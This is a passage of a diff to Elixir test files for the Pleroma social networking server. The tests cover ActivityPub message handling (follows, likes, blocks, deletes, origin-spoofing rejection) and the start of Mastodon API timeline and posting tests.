	"http://mastodon.example.org/users/admin/followers",
	"http://localtesting.pleroma.lol/users/lain"
	]

	assert data["actor"] == "http://mastodon.example.org/users/admin"

	object = data["object"]
	assert object["id"] == "http://mastodon.example.org/users/admin/statuses/99512778738411822"

	assert object["to"] == ["https://www.w3.org/ns/activitystreams#Public"]

	assert object["cc"] == [
	"http://mastodon.example.org/users/admin/followers",
	"http://localtesting.pleroma.lol/users/lain"
	]

	assert object["actor"] == "http://mastodon.example.org/users/admin"
	assert object["attributedTo"] == "http://mastodon.example.org/users/admin"

	assert object["context"] ==
	"tag:mastodon.example.org,2018-02-12:objectId=20:objectType=Conversation"

	assert object["sensitive"] == true

	user = User.get_by_ap_id(object["actor"])

	assert user.info.note_count == 1
	end

	test "it works for incoming notices with hashtags" do
	data = File.read!("test/fixtures/mastodon-post-activity-hashtag.json") \|> Poison.decode!()

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)
	assert Enum.at(data["object"]["tag"], 2) == "moo"
	end

	test "it works for incoming notices with contentMap" do
	data =
	File.read!("test/fixtures/mastodon-post-activity-contentmap.json") \|> Poison.decode!()

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["object"]["content"] ==
	"<p><span class=\"h-card\"><a href=\"http://localtesting.pleroma.lol/users/lain\" class=\"u-url mention\">@<span>lain</span></a></span></p>"
	end

	test "it works for incoming notices with to/cc not being an array (kroeg)" do
	data = File.read!("test/fixtures/kroeg-post-activity.json") \|> Poison.decode!()

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["object"]["content"] ==
	"<p>henlo from my Psion netBook</p><p>message sent from my Psion netBook</p>"
	end

	test "it works for incoming announces with actor being inlined (kroeg)" do
	data = File.read!("test/fixtures/kroeg-announce-with-inline-actor.json") \|> Poison.decode!()

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["actor"] == "https://puckipedia.com/"
	end

	test "it works for incoming notices with tag not being an array (kroeg)" do
	data = File.read!("test/fixtures/kroeg-array-less-emoji.json") \|> Poison.decode!()

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["object"]["emoji"] == %{
	"icon_e_smile" => "https://puckipedia.com/forum/images/smilies/icon_e_smile.png"
	}

	data = File.read!("test/fixtures/kroeg-array-less-hashtag.json") \|> Poison.decode!()

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert "test" in data["object"]["tag"]
	end

	test "it works for incoming notices with url not being a string (prismo)" do
	data = File.read!("test/fixtures/prismo-url-map.json") \|> Poison.decode!()

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["object"]["url"] == "https://prismo.news/posts/83"
	end

	test "it works for incoming follow requests" do
	user = insert(:user)

	data =
	File.read!("test/fixtures/mastodon-follow-activity.json")
	\|> Poison.decode!()
	\|> Map.put("object", user.ap_id)

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["actor"] == "http://mastodon.example.org/users/admin"
	assert data["type"] == "Follow"
	assert data["id"] == "http://mastodon.example.org/users/admin#follows/2"
	assert User.following?(User.get_by_ap_id(data["actor"]), user)
	end

	test "it works for incoming follow requests from hubzilla" do
	user = insert(:user)

	data =
	File.read!("test/fixtures/hubzilla-follow-activity.json")
	\|> Poison.decode!()
	\|> Map.put("object", user.ap_id)
	\|> Utils.normalize_params()

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["actor"] == "https://hubzilla.example.org/channel/kaniini"
	assert data["type"] == "Follow"
	assert data["id"] == "https://hubzilla.example.org/channel/kaniini#follows/2"
	assert User.following?(User.get_by_ap_id(data["actor"]), user)
	end

	test "it works for incoming likes" do
	user = insert(:user)
	{:ok, activity} = CommonAPI.post(user, %{"status" => "hello"})

	data =
	File.read!("test/fixtures/mastodon-like.json")
	\|> Poison.decode!()
	\|> Map.put("object", activity.data["object"]["id"])

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["actor"] == "http://mastodon.example.org/users/admin"
	assert data["type"] == "Like"
	assert data["id"] == "http://mastodon.example.org/users/admin#likes/2"
	assert data["object"] == activity.data["object"]["id"]
	end

	test "it returns an error for incoming unlikes wihout a like activity" do
	user = insert(:user)
	{:ok, activity} = CommonAPI.post(user, %{"status" => "leave a like pls"})

	data =
	File.read!("test/fixtures/mastodon-undo-like.json")
	\|> Poison.decode!()
	\|> Map.put("object", activity.data["object"]["id"])

	assert Transmogrifier.handle_incoming(data) == :error
	end

	test "it works for incoming unlikes with an existing like activity" do
	user = insert(:user)
	{:ok, activity} = CommonAPI.post(user, %{"status" => "leave a like pls"})

	like_data =
	File.read!("test/fixtures/mastodon-like.json")
	\|> Poison.decode!()
	\|> Map.put("object", activity.data["object"]["id"])

	{:ok, %Activity{data: like_data, local: false}} = Transmogrifier.handle_incoming(like_data)

	data =
	File.read!("test/fixtures/mastodon-undo-like.json")
	\|> Poison.decode!()
	\|> Map.put("object", like_data)
	\|> Map.put("actor", like_data["actor"])

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["actor"] == "http://mastodon.example.org/users/admin"
	assert data["type"] == "Undo"
	assert data["id"] == "http://mastodon.example.org/users/admin#likes/2/undo"
	assert data["object"]["id"] == "http://mastodon.example.org/users/admin#likes/2"
	end

	test "it works for incoming announces" do
	data = File.read!("test/fixtures/mastodon-announce.json") \|> Poison.decode!()

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["actor"] == "http://mastodon.example.org/users/admin"
	assert data["type"] == "Announce"

	assert data["id"] ==
	"http://mastodon.example.org/users/admin/statuses/99542391527669785/activity"

	assert data["object"] ==
	"http://mastodon.example.org/users/admin/statuses/99541947525187367"

	assert Activity.get_create_activity_by_object_ap_id(data["object"])
	end

	test "it works for incoming announces with an existing activity" do
	user = insert(:user)
	{:ok, activity} = CommonAPI.post(user, %{"status" => "hey"})

	data =
	File.read!("test/fixtures/mastodon-announce.json")
	\|> Poison.decode!()
	\|> Map.put("object", activity.data["object"]["id"])

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["actor"] == "http://mastodon.example.org/users/admin"
	assert data["type"] == "Announce"

	assert data["id"] ==
	"http://mastodon.example.org/users/admin/statuses/99542391527669785/activity"

	assert data["object"] == activity.data["object"]["id"]

	assert Activity.get_create_activity_by_object_ap_id(data["object"]).id == activity.id
	end

	test "it works for incoming update activities" do
	data = File.read!("test/fixtures/mastodon-post-activity.json") \|> Poison.decode!()

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)
	update_data = File.read!("test/fixtures/mastodon-update.json") \|> Poison.decode!()

	object =
	update_data["object"]
	\|> Map.put("actor", data["actor"])
	\|> Map.put("id", data["actor"])

	update_data =
	update_data
	\|> Map.put("actor", data["actor"])
	\|> Map.put("object", object)

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(update_data)

	user = User.get_cached_by_ap_id(data["actor"])
	assert user.name == "gargle"

	assert user.avatar["url"] == [
	%{
	"href" =>
	"https://cd.niu.moe/accounts/avatars/000/033/323/original/fd7f8ae0b3ffedc9.jpeg"
	}
	]

	assert user.info.banner["url"] == [
	%{
	"href" =>
	"https://cd.niu.moe/accounts/headers/000/033/323/original/850b3448fa5fd477.png"
	}
	]

	assert user.bio == "<p>Some bio</p>"
	end

	test "it works for incoming update activities which lock the account" do
	data = File.read!("test/fixtures/mastodon-post-activity.json") \|> Poison.decode!()

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)
	update_data = File.read!("test/fixtures/mastodon-update.json") \|> Poison.decode!()

	object =
	update_data["object"]
	\|> Map.put("actor", data["actor"])
	\|> Map.put("id", data["actor"])
	\|> Map.put("manuallyApprovesFollowers", true)

	update_data =
	update_data
	\|> Map.put("actor", data["actor"])
	\|> Map.put("object", object)

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(update_data)

	user = User.get_cached_by_ap_id(data["actor"])
	assert user.info.locked == true
	end

	test "it works for incoming deletes" do
	activity = insert(:note_activity)

	data =
	File.read!("test/fixtures/mastodon-delete.json")
	\|> Poison.decode!()

	object =
	data["object"]
	\|> Map.put("id", activity.data["object"]["id"])

	data =
	data
	\|> Map.put("object", object)
	\|> Map.put("actor", activity.data["actor"])

	{:ok, %Activity{local: false}} = Transmogrifier.handle_incoming(data)

	refute Repo.get(Activity, activity.id)
	end

	test "it fails for incoming deletes with spoofed origin" do
	activity = insert(:note_activity)

	data =
	File.read!("test/fixtures/mastodon-delete.json")
	\|> Poison.decode!()

	object =
	data["object"]
	\|> Map.put("id", activity.data["object"]["id"])

	data =
	data
	\|> Map.put("object", object)

	:error = Transmogrifier.handle_incoming(data)

	assert Repo.get(Activity, activity.id)
	end

	test "it works for incoming unannounces with an existing notice" do
	user = insert(:user)
	{:ok, activity} = CommonAPI.post(user, %{"status" => "hey"})

	announce_data =
	File.read!("test/fixtures/mastodon-announce.json")
	\|> Poison.decode!()
	\|> Map.put("object", activity.data["object"]["id"])

	{:ok, %Activity{data: announce_data, local: false}} =
	Transmogrifier.handle_incoming(announce_data)

	data =
	File.read!("test/fixtures/mastodon-undo-announce.json")
	\|> Poison.decode!()
	\|> Map.put("object", announce_data)
	\|> Map.put("actor", announce_data["actor"])

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["type"] == "Undo"
	assert data["object"]["type"] == "Announce"
	assert data["object"]["object"] == activity.data["object"]["id"]

	assert data["object"]["id"] ==
	"http://mastodon.example.org/users/admin/statuses/99542391527669785/activity"
	end

	test "it works for incomming unfollows with an existing follow" do
	user = insert(:user)

	follow_data =
	File.read!("test/fixtures/mastodon-follow-activity.json")
	\|> Poison.decode!()
	\|> Map.put("object", user.ap_id)

	{:ok, %Activity{data: _, local: false}} = Transmogrifier.handle_incoming(follow_data)

	data =
	File.read!("test/fixtures/mastodon-unfollow-activity.json")
	\|> Poison.decode!()
	\|> Map.put("object", follow_data)

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["type"] == "Undo"
	assert data["object"]["type"] == "Follow"
	assert data["object"]["object"] == user.ap_id
	assert data["actor"] == "http://mastodon.example.org/users/admin"

	refute User.following?(User.get_by_ap_id(data["actor"]), user)
	end

	test "it works for incoming blocks" do
	user = insert(:user)

	data =
	File.read!("test/fixtures/mastodon-block-activity.json")
	\|> Poison.decode!()
	\|> Map.put("object", user.ap_id)

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["type"] == "Block"
	assert data["object"] == user.ap_id
	assert data["actor"] == "http://mastodon.example.org/users/admin"

	blocker = User.get_by_ap_id(data["actor"])

	assert User.blocks?(blocker, user)
	end

	test "incoming blocks successfully tear down any follow relationship" do
	blocker = insert(:user)
	blocked = insert(:user)

	data =
	File.read!("test/fixtures/mastodon-block-activity.json")
	\|> Poison.decode!()
	\|> Map.put("object", blocked.ap_id)
	\|> Map.put("actor", blocker.ap_id)

	{:ok, blocker} = User.follow(blocker, blocked)
	{:ok, blocked} = User.follow(blocked, blocker)

	assert User.following?(blocker, blocked)
	assert User.following?(blocked, blocker)

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)

	assert data["type"] == "Block"
	assert data["object"] == blocked.ap_id
	assert data["actor"] == blocker.ap_id

	blocker = User.get_by_ap_id(data["actor"])
	blocked = User.get_by_ap_id(data["object"])

	assert User.blocks?(blocker, blocked)

	refute User.following?(blocker, blocked)
	refute User.following?(blocked, blocker)
	end

	test "it works for incoming unblocks with an existing block" do
	user = insert(:user)

	block_data =
	File.read!("test/fixtures/mastodon-block-activity.json")
	\|> Poison.decode!()
	\|> Map.put("object", user.ap_id)

	{:ok, %Activity{data: _, local: false}} = Transmogrifier.handle_incoming(block_data)

	data =
	File.read!("test/fixtures/mastodon-unblock-activity.json")
	\|> Poison.decode!()
	\|> Map.put("object", block_data)

	{:ok, %Activity{data: data, local: false}} = Transmogrifier.handle_incoming(data)
	assert data["type"] == "Undo"
	assert data["object"]["type"] == "Block"
	assert data["object"]["object"] == user.ap_id
	assert data["actor"] == "http://mastodon.example.org/users/admin"

	blocker = User.get_by_ap_id(data["actor"])

	refute User.blocks?(blocker, user)
	end

	test "it works for incoming accepts which were pre-accepted" do
	follower = insert(:user)
	followed = insert(:user)

	{:ok, follower} = User.follow(follower, followed)
	assert User.following?(follower, followed) == true

	{:ok, follow_activity} = ActivityPub.follow(follower, followed)

	accept_data =
	File.read!("test/fixtures/mastodon-accept-activity.json")
	\|> Poison.decode!()
	\|> Map.put("actor", followed.ap_id)

	object =
	accept_data["object"]
	\|> Map.put("actor", follower.ap_id)
	\|> Map.put("id", follow_activity.data["id"])

	accept_data = Map.put(accept_data, "object", object)

	{:ok, activity} = Transmogrifier.handle_incoming(accept_data)
	refute activity.local

	assert activity.data["object"] == follow_activity.data["id"]

	follower = Repo.get(User, follower.id)

	assert User.following?(follower, followed) == true
	end

	test "it works for incoming accepts which were orphaned" do
	follower = insert(:user)
	followed = insert(:user, %{info: %User.Info{locked: true}})

	{:ok, follow_activity} = ActivityPub.follow(follower, followed)

	accept_data =
	File.read!("test/fixtures/mastodon-accept-activity.json")
	\|> Poison.decode!()
	\|> Map.put("actor", followed.ap_id)

	accept_data =
	Map.put(accept_data, "object", Map.put(accept_data["object"], "actor", follower.ap_id))

	{:ok, activity} = Transmogrifier.handle_incoming(accept_data)
	assert activity.data["object"] == follow_activity.data["id"]

	follower = Repo.get(User, follower.id)

	assert User.following?(follower, followed) == true
	end

	test "it works for incoming accepts which are referenced by IRI only" do
	follower = insert(:user)
	followed = insert(:user, %{info: %User.Info{locked: true}})

	{:ok, follow_activity} = ActivityPub.follow(follower, followed)

	accept_data =
	File.read!("test/fixtures/mastodon-accept-activity.json")
	\|> Poison.decode!()
	\|> Map.put("actor", followed.ap_id)
	\|> Map.put("object", follow_activity.data["id"])

	{:ok, activity} = Transmogrifier.handle_incoming(accept_data)
	assert activity.data["object"] == follow_activity.data["id"]

	follower = Repo.get(User, follower.id)

	assert User.following?(follower, followed) == true
	end

	test "it fails for incoming accepts which cannot be correlated" do
	follower = insert(:user)
	followed = insert(:user, %{info: %User.Info{locked: true}})

	accept_data =
	File.read!("test/fixtures/mastodon-accept-activity.json")
	\|> Poison.decode!()
	\|> Map.put("actor", followed.ap_id)

	accept_data =
	Map.put(accept_data, "object", Map.put(accept_data["object"], "actor", follower.ap_id))

	:error = Transmogrifier.handle_incoming(accept_data)

	follower = Repo.get(User, follower.id)

	refute User.following?(follower, followed) == true
	end

	test "it fails for incoming rejects which cannot be correlated" do
	follower = insert(:user)
	followed = insert(:user, %{info: %User.Info{locked: true}})

	accept_data =
	File.read!("test/fixtures/mastodon-reject-activity.json")
	\|> Poison.decode!()
	\|> Map.put("actor", followed.ap_id)

	accept_data =
	Map.put(accept_data, "object", Map.put(accept_data["object"], "actor", follower.ap_id))

	:error = Transmogrifier.handle_incoming(accept_data)

	follower = Repo.get(User, follower.id)

	refute User.following?(follower, followed) == true
	end

	test "it works for incoming rejects which are orphaned" do
	follower = insert(:user)
	followed = insert(:user, %{info: %User.Info{locked: true}})

	{:ok, follower} = User.follow(follower, followed)
	{:ok, _follow_activity} = ActivityPub.follow(follower, followed)

	assert User.following?(follower, followed) == true

	reject_data =
	File.read!("test/fixtures/mastodon-reject-activity.json")
	\|> Poison.decode!()
	\|> Map.put("actor", followed.ap_id)

	reject_data =
	Map.put(reject_data, "object", Map.put(reject_data["object"], "actor", follower.ap_id))

	{:ok, activity} = Transmogrifier.handle_incoming(reject_data)
	refute activity.local

	follower = Repo.get(User, follower.id)

	assert User.following?(follower, followed) == false
	end

	test "it works for incoming rejects which are referenced by IRI only" do
	follower = insert(:user)
	followed = insert(:user, %{info: %User.Info{locked: true}})

	{:ok, follower} = User.follow(follower, followed)
	{:ok, follow_activity} = ActivityPub.follow(follower, followed)

	assert User.following?(follower, followed) == true

	reject_data =
	File.read!("test/fixtures/mastodon-reject-activity.json")
	\|> Poison.decode!()
	\|> Map.put("actor", followed.ap_id)
	\|> Map.put("object", follow_activity.data["id"])

	{:ok, %Activity{data: _}} = Transmogrifier.handle_incoming(reject_data)

	follower = Repo.get(User, follower.id)

	assert User.following?(follower, followed) == false
	end

	test "it rejects activities without a valid ID" do
	user = insert(:user)

	data =
	File.read!("test/fixtures/mastodon-follow-activity.json")
	\|> Poison.decode!()
	\|> Map.put("object", user.ap_id)
	\|> Map.put("id", "")

	:error = Transmogrifier.handle_incoming(data)
	end

	test "it remaps video URLs as attachments if necessary" do
	{:ok, object} =
	ActivityPub.fetch_object_from_id(
	"https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3"
	)

	attachment = %{
	"type" => "Link",
	"mediaType" => "video/mp4",
	"href" =>
	"https://peertube.moe/static/webseed/df5f464b-be8d-46fb-ad81-2d4c2d1630e3-480.mp4",
	"mimeType" => "video/mp4",
	"size" => 5_015_880,
	"url" => [
	%{
	"href" =>
	"https://peertube.moe/static/webseed/df5f464b-be8d-46fb-ad81-2d4c2d1630e3-480.mp4",
	"mediaType" => "video/mp4",
	"type" => "Link"
	}
	],
	"width" => 480
	}

	assert object.data["url"] ==
	"https://peertube.moe/videos/watch/df5f464b-be8d-46fb-ad81-2d4c2d1630e3"

	assert object.data["attachment"] == [attachment]
	end
	end

	describe "prepare outgoing" do
	test "it turns mentions into tags" do
	user = insert(:user)
	other_user = insert(:user)

	{:ok, activity} =
	CommonAPI.post(user, %{"status" => "hey, @#{other_user.nickname}, how are ya? #2hu"})

	{:ok, modified} = Transmogrifier.prepare_outgoing(activity.data)
	object = modified["object"]

	expected_mention = %{
	"href" => other_user.ap_id,
	"name" => "@#{other_user.nickname}",
	"type" => "Mention"
	}

	expected_tag = %{
	"href" => Pleroma.Web.Endpoint.url() <> "/tags/2hu",
	"type" => "Hashtag",
	"name" => "#2hu"
	}

	assert Enum.member?(object["tag"], expected_tag)
	assert Enum.member?(object["tag"], expected_mention)
	end

	test "it adds the sensitive property" do
	user = insert(:user)

	{:ok, activity} = CommonAPI.post(user, %{"status" => "#nsfw hey"})
	{:ok, modified} = Transmogrifier.prepare_outgoing(activity.data)

	assert modified["object"]["sensitive"]
	end

	test "it adds the json-ld context and the conversation property" do
	user = insert(:user)

	{:ok, activity} = CommonAPI.post(user, %{"status" => "hey"})
	{:ok, modified} = Transmogrifier.prepare_outgoing(activity.data)

	assert modified["@context"] ==
	Pleroma.Web.ActivityPub.Utils.make_json_ld_header()["@context"]

	assert modified["object"]["conversation"] == modified["context"]
	end

	test "it sets the 'attributedTo' property to the actor of the object if it doesn't have one" do
	user = insert(:user)

	{:ok, activity} = CommonAPI.post(user, %{"status" => "hey"})
	{:ok, modified} = Transmogrifier.prepare_outgoing(activity.data)

	assert modified["object"]["actor"] == modified["object"]["attributedTo"]
	end

	test "it translates ostatus IDs to external URLs" do
	incoming = File.read!("test/fixtures/incoming_note_activity.xml")
	{:ok, [referent_activity]} = OStatus.handle_incoming(incoming)

	user = insert(:user)

	{:ok, activity, _} = CommonAPI.favorite(referent_activity.id, user)
	{:ok, modified} = Transmogrifier.prepare_outgoing(activity.data)

	assert modified["object"] == "http://gs.example.org:4040/index.php/notice/29"
	end

	test "it translates ostatus reply_to IDs to external URLs" do
	incoming = File.read!("test/fixtures/incoming_note_activity.xml")
	{:ok, [referred_activity]} = OStatus.handle_incoming(incoming)

	user = insert(:user)

	{:ok, activity} =
	CommonAPI.post(user, %{"status" => "HI!", "in_reply_to_status_id" => referred_activity.id})

	{:ok, modified} = Transmogrifier.prepare_outgoing(activity.data)

	assert modified["object"]["inReplyTo"] == "http://gs.example.org:4040/index.php/notice/29"
	end

	test "it strips internal hashtag data" do
	user = insert(:user)

	{:ok, activity} = CommonAPI.post(user, %{"status" => "#2hu"})

	expected_tag = %{
	"href" => Pleroma.Web.Endpoint.url() <> "/tags/2hu",
	"type" => "Hashtag",
	"name" => "#2hu"
	}

	{:ok, modified} = Transmogrifier.prepare_outgoing(activity.data)

	assert modified["object"]["tag"] == [expected_tag]
	end

	test "it strips internal fields" do
	user = insert(:user)

	{:ok, activity} = CommonAPI.post(user, %{"status" => "#2hu :moominmamma:"})

	{:ok, modified} = Transmogrifier.prepare_outgoing(activity.data)

	assert length(modified["object"]["tag"]) == 2

	assert is_nil(modified["object"]["emoji"])
	- assert is_nil(modified["object"]["likes"])
	assert is_nil(modified["object"]["like_count"])
	assert is_nil(modified["object"]["announcements"])
	assert is_nil(modified["object"]["announcement_count"])
	assert is_nil(modified["object"]["context_id"])
	end
	+
	+ test "it strips internal fields of article" do
	+ activity = insert(:article_activity)
	+
	+ {:ok, modified} = Transmogrifier.prepare_outgoing(activity.data)
	+
	+ assert length(modified["object"]["tag"]) == 2
	+
	+ assert is_nil(modified["object"]["emoji"])
	+ assert is_nil(modified["object"]["like_count"])
	+ assert is_nil(modified["object"]["announcements"])
	+ assert is_nil(modified["object"]["announcement_count"])
	+ assert is_nil(modified["object"]["context_id"])
	+ end
	+
	+ test "it adds like collection to object" do
	+ activity = insert(:note_activity)
	+ {:ok, modified} = Transmogrifier.prepare_outgoing(activity.data)
	+
	+ assert modified["object"]["likes"]["type"] == "OrderedCollection"
	+ assert modified["object"]["likes"]["totalItems"] == 0
	+ end
	end

	describe "user upgrade" do
	test "it upgrades a user to activitypub" do
	user =
	insert(:user, %{
	nickname: "rye@niu.moe",
	local: false,
	ap_id: "https://niu.moe/users/rye",
	follower_address: User.ap_followers(%User{nickname: "rye@niu.moe"})
	})

	user_two = insert(:user, %{following: [user.follower_address]})

	{:ok, activity} = CommonAPI.post(user, %{"status" => "test"})
	{:ok, unrelated_activity} = CommonAPI.post(user_two, %{"status" => "test"})
	assert "http://localhost:4001/users/rye@niu.moe/followers" in activity.recipients

	user = Repo.get(User, user.id)
	assert user.info.note_count == 1

	{:ok, user} = Transmogrifier.upgrade_user_from_ap_id("https://niu.moe/users/rye")
	assert user.info.ap_enabled
	assert user.info.note_count == 1
	assert user.follower_address == "https://niu.moe/users/rye/followers"

	# Wait for the background task
	:timer.sleep(1000)

	user = Repo.get(User, user.id)
	assert user.info.note_count == 1

	activity = Repo.get(Activity, activity.id)
	assert user.follower_address in activity.recipients

	assert %{
	"url" => [
	%{
	"href" =>
	"https://cdn.niu.moe/accounts/avatars/000/033/323/original/fd7f8ae0b3ffedc9.jpeg"
	}
	]
	} = user.avatar

	assert %{
	"url" => [
	%{
	"href" =>
	"https://cdn.niu.moe/accounts/headers/000/033/323/original/850b3448fa5fd477.png"
	}
	]
	} = user.info.banner

	refute "..." in activity.recipients

	unrelated_activity = Repo.get(Activity, unrelated_activity.id)
	refute user.follower_address in unrelated_activity.recipients

	user_two = Repo.get(User, user_two.id)
	assert user.follower_address in user_two.following
	refute "..." in user_two.following
	end
	end

	describe "maybe_retire_websub" do
	test "it deletes all websub client subscripitions with the user as topic" do
	subscription = %WebsubClientSubscription{topic: "https://niu.moe/users/rye.atom"}
	{:ok, ws} = Repo.insert(subscription)

	subscription = %WebsubClientSubscription{topic: "https://niu.moe/users/pasty.atom"}
	{:ok, ws2} = Repo.insert(subscription)

	Transmogrifier.maybe_retire_websub("https://niu.moe/users/rye")

	refute Repo.get(WebsubClientSubscription, ws.id)
	assert Repo.get(WebsubClientSubscription, ws2.id)
	end
	end

	describe "actor rewriting" do
	test "it fixes the actor URL property to be a proper URI" do
	data = %{
	"url" => %{"href" => "http://example.com"}
	}

	rewritten = Transmogrifier.maybe_fix_user_object(data)
	assert rewritten["url"] == "http://example.com"
	end
	end

	describe "actor origin containment" do
	test "it rejects objects with a bogus origin" do
	{:error, _} = ActivityPub.fetch_object_from_id("https://info.pleroma.site/activity.json")
	end

	test "it rejects activities which reference objects with bogus origins" do
	data = %{
	"@context" => "https://www.w3.org/ns/activitystreams",
	"id" => "http://mastodon.example.org/users/admin/activities/1234",
	"actor" => "http://mastodon.example.org/users/admin",
	"to" => ["https://www.w3.org/ns/activitystreams#Public"],
	"object" => "https://info.pleroma.site/activity.json",
	"type" => "Announce"
	}

	:error = Transmogrifier.handle_incoming(data)
	end

	test "it rejects objects when attributedTo is wrong (variant 1)" do
	{:error, _} = ActivityPub.fetch_object_from_id("https://info.pleroma.site/activity2.json")
	end

	test "it rejects activities which reference objects that have an incorrect attribution (variant 1)" do
	data = %{
	"@context" => "https://www.w3.org/ns/activitystreams",
	"id" => "http://mastodon.example.org/users/admin/activities/1234",
	"actor" => "http://mastodon.example.org/users/admin",
	"to" => ["https://www.w3.org/ns/activitystreams#Public"],
	"object" => "https://info.pleroma.site/activity2.json",
	"type" => "Announce"
	}

	:error = Transmogrifier.handle_incoming(data)
	end

	test "it rejects objects when attributedTo is wrong (variant 2)" do
	{:error, _} = ActivityPub.fetch_object_from_id("https://info.pleroma.site/activity3.json")
	end

	test "it rejects activities which reference objects that have an incorrect attribution (variant 2)" do
	data = %{
	"@context" => "https://www.w3.org/ns/activitystreams",
	"id" => "http://mastodon.example.org/users/admin/activities/1234",
	"actor" => "http://mastodon.example.org/users/admin",
	"to" => ["https://www.w3.org/ns/activitystreams#Public"],
	"object" => "https://info.pleroma.site/activity3.json",
	"type" => "Announce"
	}

	:error = Transmogrifier.handle_incoming(data)
	end
	end

	describe "general origin containment" do
	test "contain_origin_from_id() catches obvious spoofing attempts" do
	data = %{
	"id" => "http://example.com/~alyssa/activities/1234.json"
	}

	:error =
	Transmogrifier.contain_origin_from_id(
	"http://example.org/~alyssa/activities/1234.json",
	data
	)
	end

	test "contain_origin_from_id() allows alternate IDs within the same origin domain" do
	data = %{
	"id" => "http://example.com/~alyssa/activities/1234.json"
	}

	:ok =
	Transmogrifier.contain_origin_from_id(
	"http://example.com/~alyssa/activities/1234",
	data
	)
	end

	test "contain_origin_from_id() allows matching IDs" do
	data = %{
	"id" => "http://example.com/~alyssa/activities/1234.json"
	}

	:ok =
	Transmogrifier.contain_origin_from_id(
	"http://example.com/~alyssa/activities/1234.json",
	data
	)
	end

	test "users cannot be collided through fake direction spoofing attempts" do
	insert(:user, %{
	nickname: "rye@niu.moe",
	local: false,
	ap_id: "https://niu.moe/users/rye",
	follower_address: User.ap_followers(%User{nickname: "rye@niu.moe"})
	})

	{:error, _} = User.get_or_fetch_by_ap_id("https://n1u.moe/users/rye")
	end

	test "all objects with fake directions are rejected by the object fetcher" do
	{:error, _} =
	ActivityPub.fetch_and_contain_remote_object_from_id(
	"https://info.pleroma.site/activity4.json"
	)
	end
	end
	end
	diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
	index b448d13f5..dd84052a3 100644
	--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
	+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
	@@ -1,1554 +1,1606 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Web.MastodonAPI.MastodonAPIControllerTest do
	use Pleroma.Web.ConnCase

	alias Pleroma.Web.TwitterAPI.TwitterAPI
	alias Pleroma.{Repo, User, Object, Activity, Notification}
	alias Pleroma.Web.{OStatus, CommonAPI}
	alias Pleroma.Web.ActivityPub.ActivityPub
	alias Pleroma.Web.MastodonAPI.FilterView
	import Pleroma.Factory
	import ExUnit.CaptureLog
	import Tesla.Mock

	setup do
	mock(fn env -> apply(HttpRequestMock, :request, [env]) end)
	:ok
	end

	test "the home timeline", %{conn: conn} do
	user = insert(:user)
	following = insert(:user)

	{:ok, _activity} = TwitterAPI.create_status(following, %{"status" => "test"})

	conn =
	conn
	\|> assign(:user, user)
	\|> get("/api/v1/timelines/home")

	assert length(json_response(conn, 200)) == 0

	{:ok, user} = User.follow(user, following)

	conn =
	build_conn()
	\|> assign(:user, user)
	\|> get("/api/v1/timelines/home")

	assert [%{"content" => "test"}] = json_response(conn, 200)
	end

	test "the public timeline", %{conn: conn} do
	following = insert(:user)

	capture_log(fn ->
	{:ok, _activity} = TwitterAPI.create_status(following, %{"status" => "test"})

	{:ok, [_activity]} =
	OStatus.fetch_activity_from_url("https://shitposter.club/notice/2827873")

	conn =
	conn
	\|> get("/api/v1/timelines/public", %{"local" => "False"})

	assert length(json_response(conn, 200)) == 2

	conn =
	build_conn()
	\|> get("/api/v1/timelines/public", %{"local" => "True"})

	assert [%{"content" => "test"}] = json_response(conn, 200)

	conn =
	build_conn()
	\|> get("/api/v1/timelines/public", %{"local" => "1"})

	assert [%{"content" => "test"}] = json_response(conn, 200)
	end)
	end

	test "posting a status", %{conn: conn} do
	user = insert(:user)

	idempotency_key = "Pikachu rocks!"

	conn_one =
	conn
	\|> assign(:user, user)
	\|> put_req_header("idempotency-key", idempotency_key)
	\|> post("/api/v1/statuses", %{
	"status" => "cofe",
	"spoiler_text" => "2hu",
	"sensitive" => "false"
	})

	{:ok, ttl} = Cachex.ttl(:idempotency_cache, idempotency_key)
	# Six hours
	assert ttl > :timer.seconds(6 * 60 * 60 - 1)

	assert %{"content" => "cofe", "id" => id, "spoiler_text" => "2hu", "sensitive" => false} =
	json_response(conn_one, 200)

	assert Repo.get(Activity, id)

	conn_two =
	conn
	\|> assign(:user, user)
	\|> put_req_header("idempotency-key", idempotency_key)
	\|> post("/api/v1/statuses", %{
	"status" => "cofe",
	"spoiler_text" => "2hu",
	"sensitive" => "false"
	})

	assert %{"id" => second_id} = json_response(conn_two, 200)

	assert id == second_id

